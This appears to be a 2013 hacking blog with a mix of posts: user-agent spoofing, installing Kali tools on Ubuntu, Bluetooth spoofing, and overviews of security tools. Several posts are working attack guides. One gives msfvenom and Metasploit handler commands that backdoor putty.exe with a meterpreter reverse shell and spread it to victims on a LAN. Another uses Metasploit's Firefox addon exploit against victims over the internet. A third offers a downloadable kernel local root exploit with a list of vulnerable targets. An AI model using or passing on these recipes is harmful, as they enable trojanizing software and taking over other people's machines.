Saturday, 31 August 2013

How To Anonymize OS And Browser Details Using User-Agent Spoofing

What is User-Agent??:
User-Agent is often used for content negotiation, where the origin server selects suitable content or operating parameters for the response of client client's request. For example, the User-Agent string of visitor might be used by server to deliver the contents compatible with client's OS or browser.
User-Agent information is sent to server through HTTP-headers which tell server a lot about client's OS and browser version.

User-Agent String Format For Browers:
Most Web browsers use a User-Agent value as follows:  

Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions].  

For example, Safari on the iPad has used the following:
 
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

The components of this string are as follows:

  • Mozilla/5.0: Previously used to indicate compatibility with the Mozilla rendering engine
  • (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us): Details of the system in which the browser is running
  • AppleWebKit/531.21.10: The platform the browser uses
  • (KHTML, like Gecko): Browser platform details
  • Mobile/7B405: This is used by the browser to indicate specific enhancements that are available directly in the browser or through third parties. An example of this is Microsoft Live Meeting which registers an extension so that the Live Meeting service knows if the software is already installed, which means it can provide a streamlined experience to joining meetings.
Format for Automated Agents (Bots):
Automated web crawling tools can use a simplified form, where an important field is contact information in case of problems. By convention the word "bot" is included in the name of the agent. For example:
 Googlebot/2.1 (+http://www.google.com/bot.html) 
How Websites Detect Visitor's OS and Browser:
As I have shown in above user-agent string format for browser that OS and system information can be extracted from your visitor's user-agent string. You can see below your OS and Browser information.
Note: This detection is simple. So, Android OS will showed as Unix.


Countermeasures:
Well, how can we fool some site and give some bogus info . This thing can be done by user-agent spoofing. 

User-Agent Spoofing:
User-agent spoofing is a technique in which we replace user-agent string of our browser with a user-agent string of some other browser or Bot. In this tutorial, I will show user-agent spoofing method for Mozilla Firefox and Google Chrome. So lets start. 

User-Agent Spoofing In Firefox: 
To do user-agent spoofing in firefox, we will use an addon named user-agent switcher

Click here to install user-agent switcher in your firefox.

Now everything is ready, so now we only need a user-agent string to replace with our current user-agent string. You can get user-agent string of any browser from here.
1- Just copy user-agent string of any browser and open user-agent switcher addon of firefox. 
2- Then click on "Edit User Agents.." and there click on "New" which will open a drop down menu, there click on "New User Agent".
user-agent-switcher
3- Now click in user agent text field as showed in above image and replace this string with our newer user agent string. 
4- Add description to remember that which user agent string it is and click OK. 
5- This new user agent will appear in your user agents dialogue box. Now click on it and click OK. Now we are using this new user agent.
6- To check either new user-agent working or not, refresh your browser page and see either my tutorial is detecting your OS and browser or not.

User-Agent Spoofing In Google Chrome: 
For google chrome users, a google chrome extension if available named user-agent switcher which can be installed from here.
Its interface is easy to use so no more information need to be provided.
google chrome user agent switcher
Select any user agent from list, come on my site and check my site is detecting your OS and Brower version or not. Thanks for reading this tutorial. If you feel any trouble while following this tutorial then you may ask in comments.

Friday, 30 August 2013

How To Integrate Kali Linux Tools In Your Favorite Ubuntu Distro

kali linux integrated in ubuntu

In this tutorial, I am using ubuntu 13.04 raring ringtail for kali linux tools integration. You can use any of the following ubuntu distro.

Raring= 13.04
Quantal= 12.10
Precise= 12.04


These distros have been tested and working perfectly with kali linux tools.

Ok lets do it. Follow me step by step.

1- Copy following repositories of kali linux.

deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu YOUR_UBUNTU_VERSION main
deb-src http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu YOUR_UBUNTU_VERSION main
deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu YOUR_UBUNTU_VERSION main
deb-src http://ppa.launchpad.net/wagungs/kali-linux/ubuntu YOUR_UBUNTU_VERSION main

Note: Replace red text "YOUR_UBUNTU_VERSION" with your ubuntu version name i.e. for ubuntu 13.04 we have name raring , so these all four lines will be written like this:

deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu raring main
deb-src http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu raring main
deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu raring main
deb-src http://ppa.launchpad.net/wagungs/kali-linux/ubuntu raring main


2- Open terminal and open /etc/apt/sources.list in your favourite text editor.I am using nano in this tutorial. Your may use gedit, vi, vim or any other editor.
sudo nano /etc/apt/sources.list
"nano" editor will open sources.list file before you. Now paste these lines at the end of your file and press CTRL + X to save it.

kali linux repos
3- Now copy following pgp key and save it in a text file with any name i.e. kali.pgp

PGP Key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.4
Comment: Hostname: keyserver.ubuntu.com

mI0ET324YwEEANbSlISrOlAGjxgFRxiN6jk0JIl/vxQ8lapRdxZ4DHDAQdXbX4AuigMBkP5e
sOxhMpDnkgMRtEVpaBMdQheA0/431pPQYqkr3jdeZw5JS5opiyJ4qr/QrcoSFHSluEkWkbZ6
RYOkA25vW31KK2FB2LQVRYk580llXAVgIUznm2ATABEBAAG0GExhdW5jaHBhZCBQUEEgZm9y
IHdhZ3VuZ4i4BBMBAgAiBQJPfbhjAhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAb
IuuNj9/bVxabBADSGN8cp+hqkdZqwq263wdz/UGsiuB1bCrH06/HznC/ZC5rjfH3aQ1Dwwag
zYCrSD3c0cKNAqD10009N76RMlzZBH8kKL9khH3zPL/k4/lYuVP7y6NKFbBsnawEUc0mWcCa
mH4ScTdWWPXP/mOQiUUjnQ1bZhzpcbQOb+hEUAqExg==
=fJ+8
-----END PGP PUBLIC KEY BLOCK-----

4- Now we need to add this pgp key in our apt. So add it using the following command.
 sudo apt-key add kali.pgp
At successful addition of key, you will see written OK.

5- Now update your apt-get repositories using following command.
sudo apt-get update
6- Now you need some package manager to install all kali linux tools at once. I am using synaptic package manager for this tutorial. If you don't have it, then you may install it using the following command.
sudo apt-get install synaptic
7- Open synaptic package manager and click on origin button in lower left side pane. You will see two kali linux repositories with following names.

LP-PPA-wagungs-kali-linux/raring
LP-PPA-wagungs-kali-linux2/raring

Click on first repository and come on right side where all tools are being shown. There press CTRL + A which will select all tools.

kali_linux_repository_in_synaptic

8- Right click and click on Mark For Installation. Now find the tools which show you red "!" . These marked packages with red sign of exclamation are broken packages which can't be installed right now. Right click on them and unmark these packages. Now do the same thing with second repository (mark all tools). Now click on apply button which will begin your installation.

Wait for its completion and enjoy kali linux tools on your favorite ubuntu distro.

Saturday, 24 August 2013

Anonymize Bluetooth Devices On Linux Using hciconfig Utility

hciconfig bluetooth configuration spoofing
In Linux OS we can enumerate and configure bluetooth devices by using a built-in utility called hciconfig.

You can get complete manual of this utility by typing following command in terminal.

$man hciconfig

In this tutorial, i will mention only most important commands which are necessary from security's point of view.

Display Basic Info About Available Bluetooth Devices:

exploiter@exploiter:~$ hciconfig
 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: E4:D5:3D:F2:7B:66  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:1105 acl:0 sco:0 events:38 errors:0
    TX bytes:2088 acl:0 sco:0 commands:38 errors:0

Output Explained:


In above command BD Adress field is important from information gathering prospective. This BD Address is used for scanning purposes using hcitool. Follow my upcoming tutorial on hcitool to get better understanding of BD Address usage. From this output, we can see that device is UP & RUNNING and PSCAN is enabled. Enabled PSCAN (Page Scan) means that bluetooth devices in our surrounding can do page scan and find our bluetooth device. RX and TX are bytes received and sent respectively from our bluetooth device hci0.

Display Info About A Specific Bluetooth Device:

exploiter@exploiter:~$ hciconfig -a hci0
 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address:
XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:551 acl:0 sco:0 events:32 errors:0
    TX bytes:2070 acl:0 sco:0 commands:32 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'ubuntu-0'
    Class: 0x6e0100
    Service Classes: Networking, Rendering, Capturing, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:

 
hci0 is bluetooth device on our system. It may be anyone hci0,hci1 etc. If you don't mention hciX in following command then this command will print all info about all bluetooth devices available on system. Here in this output, name of bluetooth device is shown. As here our bluetooth device is using OS name as its own name. We will change this info so that some person might not enumerate any info about our bluetooth device. Class is a 24 bit or 6 hex number based identity for bluetooth devices. Class entity defines that bluetooth device is of which hardware class i.e 0x78020c is class of Phone/Smart phone,0x6e0100 is class of computer etc.
In this tutorial i will show you that how you can change you device name and class to fool other people or bluetooth scanner.


Display Features Of A Specific Bluetooth Device:

exploiter@exploiter:~$ hciconfig hci0 features

 
Output:


hci0:    Type: BR/EDR  Bus: USB
    BD Address:
XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    Features page 0: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
        <3-slot packets> <5-slot packets> <encryption> <slot offset>
        <timing accuracy> <role switch> <hold mode> <sniff mode>
        <park state> <RSSI> <channel quality> <SCO link> <HV2 packets>
        <HV3 packets> <u-law log> <A-law log> <CVSD> <paging scheme>
        <power control> <transparent SCO> <broadcast encrypt>
        <EDR ACL 2 Mbps> <EDR ACL 3 Mbps> <enhanced iscan>
        <interlaced iscan> <interlaced pscan> <inquiry with RSSI>
        <extended SCO> <EV4 packets> <EV5 packets> <AFH cap. slave>
        <AFH class. slave> <3-slot EDR ACL> <5-slot EDR ACL>
        <sniff subrating> <pause encryption> <AFH cap. master>
        <AFH class. master> <EDR eSCO 2 Mbps> <EDR eSCO 3 Mbps>
        <3-slot EDR eSCO> <extended inquiry> <simple pairing>
        <encapsulated PDU> <err. data report> <non-flush flag> <LSTO>
        <inquiry TX power> <EPC> <extended features>
    Features page 1: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Output Explained:

 
In this output, all features supported by bluetooth device are shown.

Spoof Bluetooth Name And Class:

exploiter@exploiter:~$ sudo hciconfig hci0 name 'exploiter-z' class 0x78020c
exploiter@exploiter:~$ hciconfig -a hci0


Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address:
XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:2505 acl:0 sco:0 events:60 errors:0
    TX bytes:3878 acl:0 sco:0 commands:57 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'exploiter-z'
    Class: 0x78020c
    Service Classes: Capturing, Object Transfer, Audio, Telephony
    Device Class: Phone, Smart phone
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:

You can see in out put that our name and hardware class of our bluetooth device is spoofed. Now scanner will consider us a smart phone device.

Disable PSCAN AND ISCAN To Make Yourself Invisible To Bluetooth Devices:

exploiter@exploiter:~$ sudo hciconfig hci0 noscan
exploiter@exploiter:~$ hciconfig

 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address:
XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING
    RX bytes:2788 acl:0 sco:0 events:64 errors:0
    TX bytes:3891 acl:0 sco:0 commands:61 errors:0

Output Explained:


In our first command, we given a noscan parameter for hci0 device. Now check hci0 configuration, you can see device is up and running but there is no enabled PSCAN. Now you are invisible to bluetooth devices.

UP, DOWN or RESET A Bluetooth Device:

exploiter@exploiter:~$ sudo hciconfig hci0 reset
exploiter@exploiter:~$ hciconfig hci0 -a


Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:3401 acl:0 sco:0 events:101 errors:0
    TX bytes:4535 acl:0 sco:0 commands:98 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'exploiter-z'
    Class: 0x6e0100
    Service Classes: Networking, Rendering, Capturing, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:
 

You can see our device hardware class is back to computer from phone, smart phone and UP RUNNING PSCAN are back too. Our device has been reset.
Similarly up or down can be used instead of reset to make device up or down.


Blacklist BDAddress(MAC) Of A Device:

exploiter@exploiter:~$sudo hciconfig hci0 block XX:XX:XX:XX:XX:XX

Now that device having BDAddress/MAC address of XX:XX:XX:XX:XX will be blocked for hci0. To unblock this device, simply replace block with unblock.

Demo Image:
bluetooth configuration spoofed


Local Root Exploit For Linux Kernel 2.6.32 2012-2013

linux root exploit 2.6.32 2013

Download here
Zip Password: *pakmadhunters*

Note: 
Its a pre-compiled exploit and has been verified for list servers. It might working on other 2.6.32-X kernels too. So, test it and update us in comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux

How To Take Screenshot Of Expanded Gnome Menu In Linux

gnome menu screenshot


When Gnome menu is expanded, we can't take screenshot by just pressing PrntScn Key of our keyboard. We need some other solution to do this.
So here I am writing two methods which you can be used to take a screenshot with expanded Gnome Menu.

First Method:

You can run gnome-screenshot on a timer. For example:

Command:
$gnome-panel-screenshot --delay 5
This command would wait for 5 seconds before capturing your desktop which will be enough time to open gnome menu.

Second Method:

In this method, you need to use gimp image editor.
To take a screenshot, open

file  -> create ->screenshot

Choose Take Screenshot of entire screen and choose suitable time in seconds too. Gimp will take screenshot after that specific time.

gnome menu screenshot with gimp

Friday, 16 August 2013

How To Backdoor Windows Executables Using Metasploit's Plugin Msfvenom


In this tutorial, i will show you how to backdoor windows executables using Metasploit Exploitation Framework's plugin Msfvenom.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1- Open terminal and download putty using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=4444 > evilputty.exe

Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.
3- Start metasploit.

msfconsole

4- Start metasploit's reverse handler to get a reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit


5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit's handler. Happy Hacking :)

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.
Follow my following tutorial for better understanding of metasploit's working over internet.

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

Author:
Captain & exploiter-z from Pak Mad Hunters

Watch Video Tutorial:

Sunday, 11 August 2013

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

firefox bootstrapped addon attack

Metasploit has basically two type of exploits included in its database which are remote exploits and client side attacks.
Well in this tutorial, i will show you how to use metasploit's bootstrapped firefox addon over WAN (wide area network) or Internet.

Requirements:
  • Router (With Port Forwarding Support)
  • Metasploit Framework
Exploit Title: Firefox Bootstrapped Addon

I will use teamviewer to show you remote machine's ip and activities status.

Attacker's Public IP: 182.186.248.2

Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X

Step1: 
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
  1. webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
  2. payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Step2: 
Now start msfconsole and use following exploit:

use exploit/multi/browser/firefox_xpi_bootstrapped_addon


use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:


set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2 set lport 7777

Step3:
Now send this server's address to victim: 
http://182.186.248.2:8080/

When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)

Watch Video Tutorial:
 

If you feel some trouble while following tutorial you may ask me in comments.

Sunday, 4 August 2013

How To Provide Python Support For Android Using SL4A (Scripting Layer For Android)


python for android

Scripting Layer for Android (SL4A) brings scripting languages to Android by allowing you to edit and execute scripts and interactive interpreters directly on the Android device. These scripts have access to many of the APIs available to full-fledged Android applications, but with a greatly simplified interface that makes it easy to get things done.
Scripts can be run interactively in a terminal or in the background,. Python, Perl, JRuby, Lua, BeanShell, JavaScript, Tcl, and shell are currently supported, and more languages support will be added soon. 

NOTE: For Rooted Devices Only

Requirements:
  • Rooted Android Device
  • Android Terminal Emulator
  • SL4A
  • PythonForAndroid 

Saturday, 3 August 2013

dSploit Network Penetration Suite For Android Platform

dsploit network penetration suite for android

dSploit is an Android network analysis and penetration suite to perform network security assessments using android mobile device.
Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation etc .

This application is still in beta stage, a stable release will be available as soon as possible, but expect some crash or strange behavior until then, in any case, feel free to submit an issue here on GitHub.

Download Link:  dSploit

ANmap Android Nmap Tool For Network Penetration Testing

android nmap too

Nmap "Network Mapper" is a free and open source utility for network discovery and security auditing.It is the most important enumeration tool of almost every hacker.
So far it was available in windows, linux and Mac OS X. But now its available at android platform too. It is compiled from real Nmap source code by some developers to provide the support for android devices.

Note:
This tool can't use its full power without root permissions. So , try it on ROOTED Android Devices.

GUI Download Link: anmap.apk

Connectbot Secure shell (SSH) And Telnet client for the Android Platform

Connectbot Secure shell (SSH) client for the Android platform

ConnectBot is a Secure Shell client for the Android platform. Its ultimate goal is to create a secure connection through which you can use a shell on a remote machine and transfer files back and forth to your phone.

Installation:

The latest stable version of ConnectBot is available in the Android Market.
Google Play Download Link:  Connectbot

Development Version Installation Method:
If you want to run the development versions, you can follow these quick steps to getting ConnectBot working on your new G1 Android phone:
1. Enable outside-of-Market applications. Go into Settings, Applications, and enable the "Unknown sources" option.

Top 5 Nmap Essential Commands That Every Penetration Tester Must Know

nmap network mapper tool

Nmap "Network Mapper" is a free and open source utility for network discovery and security auditing.
It is the most important enumeration tool of almost every hacker. In this tutorial, i will demonstrate only the most important commands that every beginner must need to know.
Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.   

Download:

Windows: users can download its GUI  as well as command line binaries. Graphical Nmap is called Zenmap. Both are available Here.

Linux: users can download it using a terminal commands with apt-get or yum package installer tools.
  • Debian Linux: sudo apt-get install nmap
  • RPM Linux: sudo yum install nmap
Mac OS X: users can download its standalone installer from Here.

NOTE: 
Always run your Nmap tool with sudo user in linux and in windows run it as administrator for better performance and results.

Friday, 2 August 2013

RouterPwn Router Exploitation Framework

routerpwn a router exploitation framework

Routerpwn is a web application based router exploitation framework which have a collection of router exploits in a well cattform support to its users. It has been optimized to ruegorized manner.
Routerpwn is written in JavaScript and HTML to provide a multi-plan on mobile devices such as smartphones and tablets too.

Exploitation:
Most of exploit can be used within a LAN network and few don't need a network like EasyBox Standard WPA2 Key Generator exploit etc.

1- So, first of all get in LAN network of the router that you want to PWN.
2- Identify router IP by checking your IP configuration.
3- Now use nmap to identify which router is it, using the following command.(X.X.X.X is router IP)
nmap  -O -v X.X.X.X

Thursday, 1 August 2013

How To Differentiate Between Physical And Logical Hyper-Threaded Cores In Linux

processor physical and logical cores identification

Finding the number of CPU cores on a Linux server can be challenging.   The way /proc/cpuinfo displays information makes it hard to distinguish between real CPU cores and logical hyper-threading CPU's.  
For example, consider if I run the following command on my Linux laptop:

NOTE: Black text under each command is showing output.
$ cat /proc/cpuinfo  | grep processor
processor    : 0
processor    : 1
processor    : 2
processor    : 3

Vega Web Vulnerability Scanner For Windows/Linux/Mac (With Solution For Windows Installation Bugs)

Vega Open Source Web Vulnerability Scanner

Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: Javascript.